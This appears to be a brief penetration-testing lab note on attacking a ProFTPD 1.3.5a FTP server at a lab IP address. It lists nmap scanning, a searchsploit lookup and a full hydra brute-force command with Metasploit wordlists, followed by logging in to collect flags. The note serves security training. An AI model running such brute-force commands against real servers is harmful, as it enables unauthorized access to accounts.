🔬FTP
Lab 1
Target IP:
192.209.45.3
Brute-force of ProFTP server
Enumeration, nmap brute-force and flags have been already covered in this FTP Enum lab
nmap -sV 192.209.45.3
21/tcp open ftp ProFTPD 1.3.5a
Check anonymous login and inherent vulnerabilities
ftp 192.209.45.3
# anonymous login failed
ls -al /usr/share/nmap/scripts | grep ftp-*

searchsploit ProFTPD
# check exploits for the specific version
Brute-Force
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.209.45.3 -t 4 ftp

Try to connect with FTP and found credentials and retrieve every user's flag:
ftp 192.209.45.3
Last updated
Was this helpful?